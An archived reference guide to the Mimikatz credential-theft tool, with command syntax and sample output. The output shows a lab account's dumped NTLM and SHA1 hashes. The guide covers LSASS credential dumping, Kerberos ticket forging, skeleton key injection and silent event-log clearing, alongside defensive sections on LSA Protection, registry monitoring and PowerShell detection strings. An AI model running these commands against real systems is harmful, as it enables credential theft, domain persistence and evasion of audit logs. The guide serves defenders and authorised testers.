{
	"id": "f644a9e4-779e-4d89-93d1-1ad0c8643f3b",
	"created_at": "2026-04-06T00:07:06.348682Z",
	"updated_at": "2026-04-10T03:21:34.994934Z",
	"deleted_at": null,
	"sha1_hash": "dc49dc8138e64eca0a4774053cc9b3c3244adf43",
	"title": "Mimikatz",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 9529521,
	"plain_text": "Mimikatz\r\nPublished: 2015-09-20 · Archived: 2026-04-05 20:10:11 UTC\r\nUnofficial Guide to Mimikatz \u0026 Command Reference\r\nMimikatz Command Reference Version: mimikatz 2.1.1 (x64) built on Nov 28 2017\r\nPage last updated: February 17th, 2018\r\nTHIS PAGE IS ARCHIVED AND NO LONGER BEING UPDATED\r\nCheck out  The Mimikatz Missing Manual.\r\nIntroduction:\r\nIt seems like many people on both sides of the fence, Red \u0026 Blue, aren’t familiar with most of Mimikatz’s\r\ncapabilities, so I put together this information on all the available commands I could find. I plan to update as I can\r\nwith additional content about the most useful commands. This way both Red \u0026 Blue teams better understand the\r\nfull capability and are better able to secure the enterprises they are hired to protect.\r\nI developed this reference after speaking with a lot of people, hired to both defend and attack networks, I learned\r\nthat outside of a few of the mot frequently used Mimikatz commands, not many knew about the full capability of\r\nMimikatz. This page details as best as possible what each command is, how it works, the rights required to run it,\r\nthe parameters (required \u0026 optional), as well as screenshots and additional context (where possible). There are\r\nseveral I haven’t delved fully into, but expect to in the near future. While I will continue to post articles to\r\nADSecurity.org about different aspects of Mimikatz usage, I plan to keep this as updated and as comprehensive as\r\npossible. With that noted, this page will never be as up-to-date as the Mimikatz github. The best Mimikatz\r\ndocumentation is the source code. \r\nThis information is provided to help organizations better understand Mimikatz capability and is not to be used for\r\nunlawful activity. Do NOT use Mimikatz on computers you don’t own or have been allowed/approved to. 
In other\r\nwords, don’t pen-test/red-team systems with Mimikatz without a “get out of jail free card”.\r\nThis page and all content contained within is not to be reproduced in whole or part without express written\r\nconsent by this page’s author.\r\nI did not write Mimikatz and therefore have no special insight. All of the information on this page is derived from\r\nhttps://adsecurity.org/?page_id=1821\r\nPage 1 of 79\n\nusing Mimikatz, reading the source code, conversations with Benjamin, his Twitter, blog \u0026 GitHub pages, and my\r\nown work/research.\r\nAny errors on this page are my own only. Send comments/kudos here.\r\nMany thanks to Benjamin Delpy for writing and continuously updating Mimikatz. His work has greatly improved\r\nthe security of Windows, especially Windows 10.\r\nMimikatz Overview:\r\nMimikatz is one of the best tools to gather credential data from Windows systems. In fact I consider Mimikatz to\r\nbe the “Swiss army knife” (or multi-tool) of Windows credentials – that one tool that can do everything. Since the\r\nauthor of Mimikatz, Benjamin Delpy, is French, most of the resources describing Mimikatz usage are in French, at\r\nleast on his blog. The Mimikatz GitHub repository is in English and includes useful information on command\r\nusage.\r\nMimikatz is a Windows x32/x64 program coded in C by Benjamin Delpy (@gentilkiwi) in 2007 to learn more\r\nabout Windows credentials (and as a Proof of Concept). There are two optional components that provide\r\nadditional features, mimidrv (driver to interact with the Windows kernel) and mimilib (AppLocker bypass, Auth\r\npackage/SSP, password filter, and sekurlsa for WinDBG). Mimikatz requires administrator or SYSTEM and often\r\ndebug rights in order to perform certain actions and interact with the LSASS process (depending on the action\r\nrequested). 
The Mimikatz.exe contains, or at least should contain, all capability noted there.\r\nMimikatz capability can be leveraged by compiling and running your own version, running the Mimikatz\r\nexecutable, leveraging the Metasploit script, the official Invoke-Mimikatz PowerShell version, or one of the\r\ndozen Mimikatz PowerShell variants (I happen to be partial to PowerShell Empire, because Empire is\r\nawesome!).\r\nThe Mimikatz source code and release binaries are available on GitHub and are licensed under Creative Commons\r\nwith the following detail:\r\nYou are free to:\r\n*  Share — copy and redistribute the material in any medium or format\r\n*  Adapt — remix, transform, and build upon the material\r\n*  for any purpose, even commercially.\r\nThe licensor cannot revoke these freedoms as long as you follow the license terms.\r\nAttribution — You must give appropriate credit, provide a link to the license, and indicate if changes were made.\r\nYou may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use.\r\nNo additional restrictions — You may not apply legal terms or technological measures that legally restrict others\r\nfrom doing anything the license permits.\r\nMimikatz Author(s):\r\nBenjamin DELPY gentilkiwi, you can contact him on Twitter ( @gentilkiwi ) or by mail ( benjamin [at]\r\ngentilkiwi.com )\r\nDCSync function in lsadump module was co-written with Vincent LE TOUX, you can contact him by mail (\r\nvincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com )\r\n“Official” Mimikatz Links:\r\nMimikatz GitHub Location (Source Code)\r\nMimikatz Releases (includes binaries)\r\nMimikatz GitHub Wiki (Documentation, some of which is reproduced here)\r\nGentilKiwi Blog (much of it is in French, use Chrome/other for translation)\r\nMimikatz \u0026 Credentials:\r\nAfter a user logs on, a variety of credentials are generated and stored 
in the Local Security Authority Subsystem\r\nService, LSASS, process in memory. This is meant to facilitate single sign-on (SSO), ensuring a user isn’t\r\nprompted each time resource access is requested. The credential data may include Kerberos tickets, NTLM\r\npassword hashes, LM password hashes (if the password is \u003c15 characters, depending on Windows OS version and\r\npatch level), and even clear-text passwords (to support WDigest and SSP authentication, among others). While you\r\ncan prevent a Windows computer from creating the LM hash in the local computer SAM database (and the AD\r\ndatabase), this doesn’t prevent the system from generating the LM hash in memory. By default, Windows Server\r\n2008 and Windows Vista no longer generate LM hashes for users unless explicitly enabled. Starting with\r\nWindows 8.1 and Windows Server 2012 R2, the LM hash and “clear-text” password are no longer in memory.\r\nThis functionality was also “back-ported” to earlier versions of Windows (Windows 7/8/2008R2/2012) in\r\nkb2871997, though in order to prevent the “clear-text” password from being placed in LSASS, the following\r\nregistry value needs to be set to “0” (Digest Disabled):\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\r\n“UseLogonCredential” (DWORD)\r\nThis registry value is worth monitoring in your environment since an attacker may wish to set it to 1 to enable\r\nDigest password support, which forces “clear-text” passwords to be placed in LSASS on any version of Windows\r\nfrom Windows 7/2008R2 up to Windows 10/2012R2. Windows 8.1/2012 R2 and newer do not have a\r\n“UseLogonCredential” DWORD value, so it would have to be created. The existence of this value on these systems\r\nmay indicate a problem.\r\nNote that running code directly on a target system is rarely desirable for an attacker, so Mimikatz is continuously\r\nupdated with new capability to be run remotely. 
This includes running Mimikatz against a remote system\r\nto dump credentials, using Invoke-Mimikatz remotely with PowerShell Remoting, and DCSync, the latest feature\r\nto grab password data for any Active Directory account in the domain remotely against a DC without any\r\nMimikatz code being run on the DC (it uses Microsoft’s official Domain Controller replication APIs, once the\r\ncorrect rights are attained).\r\nAvailable Credentials by OS:\r\nBenjamin Delpy posted an Excel chart on OneDrive (no longer available, but shown below) that shows what type\r\nof credential data is available in memory (LSASS), including on Windows 8.1 and Windows 2012 R2 which have\r\nenhanced protection mechanisms reducing the amount and type of credentials kept in memory.\r\nPowerShell \u0026 Mimikatz:\r\nThe majority of Mimikatz functionality is available in PowerSploit (PowerShell Post-Exploitation Framework)\r\nthrough the “Invoke-Mimikatz” PowerShell script (written by Joseph Bialek) which “leverages Mimikatz 2.0 and\r\nInvoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things\r\nsuch as dump credentials without ever writing the Mimikatz binary to disk.” Note that the PowerSploit framework\r\nis now hosted in the “PowerShellMafia” GitHub repository.\r\nWhat gives Invoke-Mimikatz its “magic” is the ability to reflectively load the Mimikatz DLL (embedded in the\r\nscript) into memory. The Invoke-Mimikatz code can be downloaded from the Internet (or an intranet server), and\r\nexecuted from memory without anything touching disk. Furthermore, if Invoke-Mimikatz is run with the\r\nappropriate rights and the target computer has PowerShell Remoting enabled, it can pull credentials from other\r\nsystems, as well as execute the standard Mimikatz commands remotely, without files being dropped on the remote\r\nsystem.\r\nInvoke-Mimikatz is not updated when Mimikatz is, though it can be (manually). 
One can swap out the DLL\r\nencoded elements (32bit \u0026 64bit versions) with newer ones. Will Schroeder (@HarmJ0y) has information on\r\nupdating the Mimikatz DLLs in Invoke-Mimikatz (it’s not a very complicated process). The PowerShell Empire\r\nversion of Invoke-Mimikatz is usually kept up to date.\r\nUse mimikatz to dump credentials out of LSASS: Invoke-Mimikatz -DumpCreds\r\nUse mimikatz to export all private certificates (even if they are marked non-exportable): Invoke-Mimikatz\r\n-DumpCerts\r\nElevate privilege to have debug rights on remote computer: Invoke-Mimikatz -Command “privilege::debug\r\nexit” -ComputerName “computer1”\r\nThe Invoke-Mimikatz “Command” parameter enables Invoke-Mimikatz to run custom Mimikatz commands.\r\nDefenders should expect that any functionality included in Mimikatz is available in Invoke-Mimikatz.\r\nDetecting Mimikatz:\r\nThere are several ways to potentially detect Mimikatz use on a network, though none are guaranteed. Since\r\nMimikatz’s source code is on GitHub, anyone with Visual Studio can compile their own version. I built my own\r\nversion of Mimikatz called “kitikatz” by replacing all instances of “mimikatz” with “kitikatz” and the detection\r\nrate at VirusTotal was not good (4/54). Windows Defender on my Windows 10 system detected it. I then replaced\r\n“Benjamin Delpy” and “gentilkiwi” with the same words, just replacing the e’s with 3’s and the i’s with 1’s. The\r\ndetection rate was still poor (4/54). Windows Defender on my Windows 10 system did not detect it. So, your\r\nmileage will vary regarding detection. While VirusTotal is not the best method to determine AV detection, it is a\r\nrelatively simple method to get some basic numbers.\r\nBenjamin Delpy publishes YARA rules for Mimikatz on the Mimikatz GitHub repository.\r\nRun AntiVirus software with the latest definition files. 
According to VirusTotal, the mimikatz.exe dated\r\n11/11/2015 (32bit \u0026 64bit) is detected by 35/35 of the AV engines. Renaming the file doesn’t change the\r\nscan results. Note that Benjamin has noted real-world results to be less successful. However, AV will\r\nusually flag the known bad files. AntiVirus is part of foundational security – the first layer in “defense in\r\ndepth”.\r\nMimikatz (as of October) activates attached BusyLights. [implemented in Mimikatz version 2.0 alpha\r\n20151008 (oe.eo) edition]\r\nLeverage security software to identify processes that interact with LSASS. Security software that monitors\r\nfor process injection may also be able to regularly detect Mimikatz use.\r\nHoneyTokens/HoneyHashes involve placing special credentials in memory on a number of computers in\r\nthe enterprise. These credentials are flagged so when anyone attempts to use them, a critical alert goes out.\r\nThis requires some sort of push method as well as placing credentials that are attractive to an attacker. In\r\ntheory, this could detect credential theft and use in the environment.\r\nIf the WDIGEST registry value\r\n(HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest) is\r\nsupposed to be set to “0” in the enterprise to prevent “clear-text” passwords from being stored in LSASS\r\nand there are systems where it was switched to “1”, this may be indicative of credential theft activity. This\r\nregistry value is worth monitoring in your environment since an attacker may wish to set it to 1 to enable\r\nDigest password support, which forces “clear-text” passwords to be placed in LSASS on any version of\r\nWindows from Windows 7/2008R2 up to Windows 10/2012R2 (probably 2016 as well).\r\nForged Kerberos ticket detection is covered on this page I published in early 2015. These methods can\r\ndetect Golden Tickets, Silver Tickets, and Trust Tickets. 
I also have information on how to detect MS14-068 Kerberos vulnerability exploitation.\r\nEnable LSA Protection on all Windows versions in the enterprise that support it. This prevents Mimikatz\r\nfrom working “out-of-the-box” and requires use of the Mimikatz driver, which logs events when it interacts\r\nwith LSASS.\r\nThere are new/updated events starting with Windows 10 and Windows Server 2016 to potentially detect\r\nMimikatz use:\r\nAdded a default process SACL to LSASS.exe\r\nIn Windows 10, a default process SACL was added to LSASS.exe to log processes attempting to access\r\nLSASS.exe. The SACL is L\"S:(AU;SAFA;0x0010;;;WD)\". You can enable this under Advanced Audit\r\nPolicy Configuration\\Object Access\\Audit Kernel Object.\r\nThis can help identify attacks that steal credentials from the memory of a process.\r\nMimikatz \u0026 LSA Protection:\r\nWindows Server 2012 R2 and Windows 8.1 include a new feature called LSA Protection which involves enabling\r\nLSASS as a protected process on Windows Server 2012 R2 (Mimikatz can bypass with a driver, but that should\r\nmake some noise in the event logs):\r\nThe LSA, which includes the Local Security Authority Server Service (LSASS) process, validates users for local\r\nand remote sign-ins and enforces local security policies. The Windows 8.1 operating system provides additional\r\nprotection for the LSA to prevent reading memory and code injection by non-protected processes. This provides\r\nadded security for the credentials that the LSA stores and manages.\r\nEnabling LSA protection:\r\n1. Open the Registry Editor (RegEdit.exe), and navigate to the registry key that is located at:\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa and set the value of the registry\r\nkey to: “RunAsPPL”=dword:00000001.\r\n2. Create a new GPO and browse to Computer Configuration, Preferences, Windows Settings. 
Right-click\r\nRegistry, point to New, and then click Registry Item. The New Registry Properties dialog box appears. In\r\nthe Hive list, click HKEY_LOCAL_MACHINE. In the Key Path list, browse to\r\nSYSTEM\\CurrentControlSet\\Control\\Lsa. In the Value name box, type RunAsPPL. In the Value type box,\r\nclick the REG_DWORD. In the Value data box, type 00000001. Click OK.\r\nLSA Protection prevents non-protected processes from interacting with LSASS. Mimikatz can still bypass this\r\nwith a driver (“!+”).\r\nDetecting Invoke-Mimikatz:\r\nEnsure all Windows systems have PowerShell v3 or newer. Newer versions of PowerShell have better\r\nlogging features, especially PowerShell v5.\r\nEnable PowerShell Module Logging via Group Policy: Computer Configuration, Policies, Administrative\r\nTemplates, Windows Components, Windows PowerShell, Turn on Module Logging. Enter “*” and\r\nclick OK. This will log all PowerShell activity including all PowerShell modules.\r\nPowerShell activity will be logged to the PowerShell Operational Log. 
Push or pull these events to a\r\ncentral logging server (via Windows Event Forwarding or similar) or SIEM.\r\nParse PowerShell events for the following:\r\n“System.Reflection.AssemblyName”\r\n“System.Reflection.Emit.AssemblyBuilderAccess”\r\n“System.Runtime.InteropServices.MarshalAsAttribute”\r\n“TOKEN_PRIVILEGES”\r\n“SE_PRIVILEGE_ENABLED”\r\nNote: While it may be possible to identify Mimikatz usage by alerting on “mimikatz”, “Delpy”, or “gentilkiwi”, a\r\n“sophisticated” attacker will likely roll their own version of Mimikatz or Invoke-Mimikatz without these keywords.\r\nDetecting Offensive PowerShell Tools:\r\nMany PowerShell offensive tools use the following calls, which are logged in PowerShell Module Logging.\r\n“GetDelegateForFunctionPointer”\r\n“System.Reflection.AssemblyName”\r\n“System.Reflection.Emit.AssemblyBuilderAccess”\r\n“System.Management.Automation.WindowsErrorReporting”\r\n“MiniDumpWriteDump”\r\n“TOKEN_IMPERSONATE”\r\n“TOKEN_DUPLICATE”\r\n“TOKEN_ADJUST_PRIVILEGES”\r\n“TOKEN_PRIVILEGES”\r\n“Sneaky” Mimikatz Execution:\r\nCasey Smith (@subtee \u0026 blog) has done a LOT of work showing how application whitelisting is not the panacea\r\nmany believe it to be. 
Despite that, application whitelisting is a solid layer in a defense in depth strategy.\r\nCasey also has come up with many creative and sneaky ways to execute Mimikatz.\r\nExecute Mimikatz Inside of RegSvcs or RegAsm – .NET utilities Proof of Concept\r\nMimikatz packed \u0026 hidden in an image file\r\nDownloads and Executes Mimikatz In Memory From GitHub\r\nNote: Subtee has discontinued his GitHub repo, so these links no longer work and have been removed.\r\nMost Popular Mimikatz Commands:\r\nHere are just some of the most popular Mimikatz commands and related functionality.\r\nCRYPTO::Certificates – list/export certificates\r\nKERBEROS::Golden – create golden/silver/trust tickets\r\nKERBEROS::List – List all user tickets (TGT and TGS) in user memory. No special privileges required\r\nsince it only displays the current user’s tickets. Similar to functionality of “klist”.\r\nKERBEROS::PTT – pass the ticket. Typically used to inject a stolen or forged Kerberos ticket\r\n(golden/silver/trust).\r\nLSADUMP::DCSync – ask a DC to synchronize an object (get password data for account). No need to run\r\ncode on DC.\r\nLSADUMP::LSA – Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject).\r\nUse to dump all Active Directory domain credentials from a Domain Controller or lsass.dmp dump file.\r\nAlso used to get a specific account credential such as krbtgt with the parameter /name: “/name:krbtgt”\r\nLSADUMP::SAM – get the SysKey to decrypt SAM entries (from registry or hive). The SAM option\r\nconnects to the local Security Account Manager (SAM) database and dumps credentials for local accounts.\r\nThis is used to dump all local credentials on a Windows computer.\r\nLSADUMP::Trust – Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly).\r\nDumps trust keys (passwords) for all associated trusts (domain/forest).\r\nMISC::AddSid – Add to the SIDHistory of a user account. 
The first value is the target account and the second\r\nvalue is the account/group name(s) (or SID). Moved to SID::modify as of May 6th, 2016.\r\nMISC::MemSSP – Inject a malicious Windows SSP to log locally authenticated credentials.\r\nMISC::Skeleton – Inject Skeleton Key into LSASS process on Domain Controller. This enables all user\r\nauthentication to the Skeleton Key patched DC to use a “master password” (aka Skeleton Keys) as well as\r\ntheir usual password.\r\nPRIVILEGE::Debug – get debug rights (this or Local System rights is required for many Mimikatz\r\ncommands).\r\nSEKURLSA::Ekeys – list Kerberos encryption keys\r\nSEKURLSA::Kerberos – List Kerberos credentials for all authenticated users (including services and\r\ncomputer account)\r\nSEKURLSA::Krbtgt – get Domain Kerberos service account (KRBTGT) password data\r\nSEKURLSA::LogonPasswords – lists all available provider credentials. This usually shows recently\r\nlogged on user and computer credentials.\r\nSEKURLSA::Pth – Pass-the-Hash and Over-Pass-the-Hash\r\nSEKURLSA::Tickets – Lists all available Kerberos tickets for all recently authenticated users, including\r\nservices running under the context of a user account and the local computer’s AD computer account.\r\nUnlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa\r\ncan access tickets of other sessions (users).\r\nTOKEN::List – list all tokens of the system\r\nTOKEN::Elevate – impersonate a token. 
Used to elevate permissions to SYSTEM (default) or find a\r\ndomain admin token on the box\r\nTOKEN::Elevate /domainadmin – impersonate a token with Domain Admin credentials.\r\nADSecurity Mimikatz Posts:\r\nAll posts mentioning Mimikatz: ADSecurity.org Mimikatz Posts\r\nMimikatz and Active Directory Kerberos Attacks\r\nDump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync\r\nHow Attackers Use Kerberos Silver Tickets to Exploit Systems\r\nMimikatz DCSync Usage, Exploitation, and Detection\r\nSneaky Active Directory Persistence #12: Malicious Security Support Provider (SSP)\r\nSneaky Active Directory Persistence #11: Directory Service Restore Mode (DSRM)\r\nKerberos Golden Tickets are Now More Golden\r\nIt’s All About Trust – Forging Kerberos Trust Tickets to Spoof Access across Active Directory Trusts\r\nDetecting Mimikatz Use\r\nMimikatz Command Guide:\r\nMimikatz can be executed in interactive mode by simply running “Mimikatz.exe”, or by passing it a command and exit\r\n(example: ‘Mimikatz “kerberos::list” exit’). Invoke-Mimikatz does not have an interactive mode.\r\nCommands can be passed from the command line to Mimikatz for processing in order, which is\r\nuseful for Invoke-Mimikatz or when using Mimikatz in scripts. Appending “exit” exits Mimikatz after the last\r\ncommand is executed (do this so Mimikatz exits gracefully).\r\nPS C:\\temp\\mimikatz\u003e .\\mimikatz \"privilege::debug\" \"sekurlsa::logonpasswords\" exit\r\n.#####. 
mimikatz 2.0 alpha (x64) release \"Kiwi en C\" (Nov 13 2015 00:44:32)\r\n .## ^ ##.\r\n ## / \\ ## /* * *\r\n ## \\ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\r\n'## v ##'\r\nhttp://blog.gentilkiwi.com/mimikatz(oe.eo)\r\n '#####'with 17 modules * * */\r\nmimikatz(commandline) # privilege::debug\r\n Privilege '20' OK\r\nmimikatz(commandline) # sekurlsa::logonpasswords\r\nAuthentication Id : 0 ; 646260 (00000000:0009dc74)\r\n Session : RemoteInteractive from 2\r\n User Name : adsadministrator\r\n Domain : ADSECLAB\r\n Logon Server : ADSDC03\r\n Logon Time : 11/27/2015 11:41:27 AM\r\n SID : S-1-5-21-1581655573-3923512380-696647894-500\r\n msv :\r\n [00000003] Primary\r\n * Username : ADSAdministrator\r\n * Domain : ADSECLAB\r\n * NTLM : 5164b7a0fda365d56739954bbbc23835\r\n * SHA1 : f8db297cb2ae403f8915675cebe79643d0d3b09f\r\n [00010000] CredentialKeys\r\n * NTLM : 5164b7a0fda365d56739954bbbc23835\r\n * SHA1 : f8db297cb2ae403f8915675cebe79643d0d3b09f\r\n tspkg :\r\n wdigest :\r\n * Username : ADSAdministrator\r\n * Domain : ADSECLAB\r\n * Password : (null)\r\n kerberos :\r\n * Username : adsadministrator\r\n * Domain : LAB.ADSECURITY.ORG\r\n * Password : (null)\r\n ssp : KO\r\nThe interactive mode provides a “Mimikatz console” where commands can be entered and executed in real-time:\r\nPS C:\\temp\\mimikatz\u003e .\\mimikatz\r\n.#####. 
mimikatz 2.0 alpha (x64) release \"Kiwi en C\" (Nov 13 2015 00:44:32)\r\n .## ^ ##.\r\n ## / \\ ## /* * *\r\n ## \\ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\r\n'## v ##'\r\nhttp://blog.gentilkiwi.com/mimikatz(oe.eo)\r\n '#####'with 17 modules * * */\r\nmimikatz # privilege::debug\r\n Privilege '20' OK\r\nmimikatz # sekurlsa::logonpasswords\r\nAuthentication Id : 0 ; 646260 (00000000:0009dc74)\r\n Session : RemoteInteractive from 2\r\n User Name : adsadministrator\r\n Domain : ADSECLAB\r\n Logon Server : ADSDC03\r\n Logon Time : 11/27/2015 11:41:27 AM\r\n SID : S-1-5-21-1581655573-3923512380-696647894-500\r\n msv :\r\n [00000003] Primary\r\n * Username : ADSAdministrator\r\n * Domain : ADSECLAB\r\n * NTLM : 5164b7a0fda365d56739954bbbc23835\r\n * SHA1 : f8db297cb2ae403f8915675cebe79643d0d3b09f\r\n [00010000] CredentialKeys\r\n * NTLM : 5164b7a0fda365d56739954bbbc23835\r\n * SHA1 : f8db297cb2ae403f8915675cebe79643d0d3b09f\r\n tspkg :\r\n wdigest :\r\n * Username : ADSAdministrator\r\n * Domain : ADSECLAB\r\n * Password : (null)\r\n kerberos :\r\n * Username : adsadministrator\r\n * Domain : LAB.ADSECURITY.ORG\r\n * Password : (null)\r\n ssp : KO\r\n credman :\r\nMimikatz Command Reference:\r\nMimikatz Version History\r\nMimikatz Modules:\r\nBUSYLIGHT\r\nCRYPTO\r\nCRYPTO::Certificates\r\nDPAPI\r\nEVENT\r\nIIS\r\nKERBEROS\r\nGolden Tickets\r\nSilver Tickets\r\nTrust Tickets\r\nKERBEROS::PTT\r\nLSADUMP\r\nDCSync\r\nDCShadow\r\nLSADUMP::LSA\r\nLSADUMP::NetSync\r\nLSADUMP::SAM\r\nLSADUMP::Trust\r\nMISC\r\nMINESWEEPER\r\nNET\r\nPRIVILEGE\r\nPRIVILEGE::Debug\r\nPROCESS\r\nRPC\r\nSERVICE\r\nSEKURLSA\r\nSEKURLSA::Kerberos\r\nSEKURLSA::Krbtgt\r\nSEKURLSA::LogonPasswords\r\nSEKURLSA::Pth\r\nSID\r\nSTANDARD\r\nSYSENV\r\nTOKEN\r\nTOKEN::Elevate\r\nTOKEN::Elevate /domainadmin\r\nTS\r\nVAULT\r\nNOTE: Any item marked “experimental” should only be used 
in test environments.\r\nVersion\r\nRun Version to get the Mimikatz version and additional information about the Windows system, such as the\r\nversion and if Credential Manager is running.\r\nBUSYLIGHT\r\nThe BUSYLIGHT Mimikatz module provides additional information for and control of connected BusyLights.\r\nBUSYLIGHT::List\r\nBUSYLIGHT::Off\r\nBUSYLIGHT::Single\r\nBUSYLIGHT::Status\r\nBUSYLIGHT::Test\r\nCRYPTO\r\nThe CRYPTO Mimikatz module provides advanced capability to interface with Windows cryptographic functions\r\n(CryptoAPI).\r\nTypical use is to export certificates that aren’t marked as “exportable.”\r\nCRYPTO::CAPI – (experimental) Patch CryptoAPI layer for easy export\r\nCRYPTO::Certificates – list/export certificates\r\nCarlos Perez (aka DarkOperator) has a great blog post on using Mimikatz to export certificates.\r\nThis command lists certificates and the properties of their keys. It can export certificates too. Typically requires\r\n“privilege::debug”\r\n/systemstore – optional – the system store that must be used (default:\r\nCERT_SYSTEM_STORE_CURRENT_USER)\r\n/store – optional – the store that must be used to list/export certificates (default: My) – full list with\r\ncrypto::stores\r\n/export – optional – export all certificates to files (public parts in DER, private parts in PFX files –\r\npassword protected with: mimikatz)\r\nBenjamin’s comments on CRYPTO::Certificates:\r\nCRYPTO::CertToHW – try to export a software CA to a crypto (virtual) hardware\r\nCRYPTO::CNG – (experimental) Patch CNG service for easy export (patches “KeyIso” service)\r\nCRYPTO::Extract – (experimental) Extract keys from CAPI RSA/AES provider\r\nCRYPTO::Hash – hash a password with optional username\r\nCRYPTO::Keys – list/export key containers\r\nCRYPTO::Providers – list cryptographic providers\r\nCRYPTO::SC – List smartcard readers\r\nCRYPTO::SCAuth – Create an 
authentication certificate (smartcard like) from a CA\r\nCRYPTO::Stores – list cryptographic stores\r\n/systemstore – optional – the system store that must be used to list stores (default:\r\nCERT_SYSTEM_STORE_CURRENT_USER)\r\nStore Options:\r\nCERT_SYSTEM_STORE_CURRENT_USER or CURRENT_USER\r\nCERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY or USER_GROUP_POLICY\r\nCERT_SYSTEM_STORE_LOCAL_MACHINE or LOCAL_MACHINE\r\nCERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY or LOCAL_MACHINE_GROUP_POLICY\r\nCERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE or LOCAL_MACHINE_ENTERPRISE\r\nCERT_SYSTEM_STORE_CURRENT_SERVICE or CURRENT_SERVICE\r\nCERT_SYSTEM_STORE_USERS or USERS\r\nCERT_SYSTEM_STORE_SERVICES or SERVICES\r\nCRYPTO::System – Describe a Windows System Certificate (file, TODO:registry or hive).\r\nDPAPI\r\nThe DPAPI Mimikatz module provides capability to extract Windows stored (and protected) credential data using\r\nDPAPI. DPAPI is the official Windows method to protect (encrypt) local data (usually passwords).\r\nStarting with Microsoft® Windows® 2000, the operating system began to provide a data protection\r\napplication-programming interface (API). This Data Protection API (DPAPI) is a pair of function calls\r\nthat provide operating system-level data protection services to user and system processes. By operating\r\nsystem-level, we mean a service that is provided by the operating system itself and does not require any\r\nadditional libraries. By data protection, we mean a service that provides confidentiality of data by using\r\nencryption. Because data protection is part of the operating system, every application can now secure\r\ndata without needing any specific cryptographic code other than the necessary function calls to DPAPI.\r\nThese calls are two simple functions with various options to modify DPAPI behavior. 
Overall, DPAPI is\r\nan easy-to-use service that will benefit developers who must provide protection for sensitive application\r\ndata, such as passwords and private keys.\r\nDPAPI is a password-based data protection service. It requires a password to provide protection. The\r\ndrawback, of course, is that all protection provided by DPAPI rests on the password provided. This is\r\noffset by DPAPI using proven cryptographic routines, specifically the strong Triple-DES algorithm, and\r\nstrong keys, which we’ll cover in more detail later. Because DPAPI is focused on providing protection\r\nfor users and requires a password to provide this protection, it logically uses the user’s logon password\r\nfor protection.\r\nThere has been some work done previously regarding attacking DPAPI:\r\nReversing DPAPI and Stealing Windows Secrets Offline\r\nDPAPI Secrets. Security analysis and data recovery in DPAPI\r\nBenjamin Delpy has an Excel spreadsheet on OneDrive which lists Windows locations that may have stored\r\ncredentials – view the spreadsheet online.\r\nDPAPI::Blob – Unprotect a DPAPI blob with API or Masterkey\r\nDPAPI::Cache\r\nDPAPI::CAPI – CAPI key test\r\nDPAPI::Chrome – Chrome test\r\nDPAPI::CNG – CNG key test\r\nDPAPI::Cred – CRED test\r\nDPAPI::CredHist – Configure a Credhist file\r\nDPAPI::MasterKey – Configure a Masterkey file, unprotect (key depending)\r\nDPAPI::Protect – Protect data using DPAPI\r\nDPAPI::Vault – VAULT test\r\nDPAPI::WIFI – WIFI test (XML profile required – reference Ben’s spreadsheet)\r\nDPAPI::WWAN – WWAN test (XML profile required – reference Ben’s spreadsheet)\r\nEVENT\r\nEVENT::Clear – Clear an event log\r\nEVENT::Drop – (experimental) Patch Events service to avoid new events\r\nNote:\r\nRun privilege::debug then event::drop to patch the event log. 
Then run Event::Clear to clear the event log without\r\nany log cleared event (1102) being logged.\r\nIIS\r\nIIS XML Config module\r\nIIS::AppHost\r\nKERBEROS\r\nThe KERBEROS Mimikatz module is used to interface with the official Microsoft Kerberos API.\r\nNo special rights are required for the commands in this module.\r\nKERBEROS::Ask – request TGS tickets\r\nKERBEROS::Clist – list tickets in MIT/Heimdal ccache\r\nKERBEROS::Golden – create golden/silver/trust tickets\r\nThe capability of this command is based on the password hash type retrieved.\r\nType | Requirement | Scope\r\nGolden | KRBTGT hash | Domain/Forest\r\nSilver | Service hash | Service\r\nTrust | Trust hash | Domain/Forest -\u003e Domain/Forest (based on account access)\r\nGolden Ticket\r\nA Golden Ticket is a TGT using the KRBTGT NTLM password hash to encrypt and sign.\r\nA Golden Ticket (GT) can be created to impersonate any user (real or imagined) in the domain as a member of any\r\ngroup in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain.\r\nSince the Golden Ticket is an authentication ticket (TGT described below), its scope is the entire domain (and the\r\nAD forest by leveraging SID History) since the TGT is used to get service tickets (TGS) used to access resources.\r\nThe Golden Ticket (TGT) contains user group membership information (PAC) and is signed and encrypted using\r\nthe domain’s Kerberos service account (KRBTGT) which can only be opened and read by the KRBTGT account.\r\nTo summarize, once an attacker gets access to the KRBTGT password hash, they can create Golden Tickets (TGT)\r\nthat provide access to anything in AD at any time.\r\nMimikatz Golden Ticket Command Reference:\r\nThe Mimikatz command to create a golden ticket is “kerberos::golden”\r\n/domain – the fully qualified domain name. In this example: “lab.adsecurity.org”.\r\n/sid – the SID of the domain. 
